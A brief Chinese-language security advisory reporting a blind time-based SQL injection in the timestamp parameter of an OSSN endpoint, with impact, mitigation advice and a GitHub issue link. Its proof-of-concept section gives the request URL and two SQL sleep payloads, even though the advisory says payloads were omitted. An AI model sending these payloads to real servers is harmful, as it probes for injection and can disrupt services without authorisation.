/action/rtcomments/status 中的盲时间型 SQL 注入(参数:timestamp)
在 /action/rtcomments/status 端点的 timestamp 参数中发现了一个盲时间型 SQL 注入漏洞。能够提供此参数的认证攻击者可能能够执行任意 SQL 查询,从而可能泄露或修改敏感数据。
影响: 数据泄露、数据篡改、权限提升,通过延时查询可能导致的拒绝服务 (DoS)(取决于数据库权限)。
缓解措施: 将 OSSN 升级到 8.9 或更高版本。此外,确保应用程序对所有数据库访问使用参数化查询/预编译语句,严格验证 timestamp 输入(仅接受预期的数字或 ISO 格式),对数据库账户实施最小权限原则,并启用查询超时和日志记录。
备注: 出于安全考虑,有意省略了利用载荷。
github: https://github.com/opensource-socialnetwork/opensource-socialnetwork/issues/2503
PoC
发送 POST 方法请求 '/action/rtcomments/status?guid=18&type=post&ossn_ts=1759741100&ossn_token=c3901a321e755ea3e9956e79eb0fbc7e674f80665725774738b93324699c7c28'
载荷:timestamp=(select*from(select(sleep(10)))a)

载荷:timestamp=(select*from(select(sleep(30)))a)
